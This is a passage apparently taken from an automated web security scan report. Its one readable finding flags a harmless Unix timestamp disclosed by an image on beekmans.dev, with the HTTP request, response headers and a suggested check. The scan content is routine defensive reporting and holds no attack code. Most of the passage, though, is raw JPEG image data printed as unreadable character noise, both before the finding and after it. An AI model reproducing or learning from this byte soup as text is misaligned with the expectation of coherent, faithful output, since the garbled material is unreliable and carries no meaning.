¿ß-û^¨õë'ÞÑÊÝ/þtEÿGû¯‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          145150258
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        35. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          167191953, which evaluates to: 1975-04-20 03:12:33

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
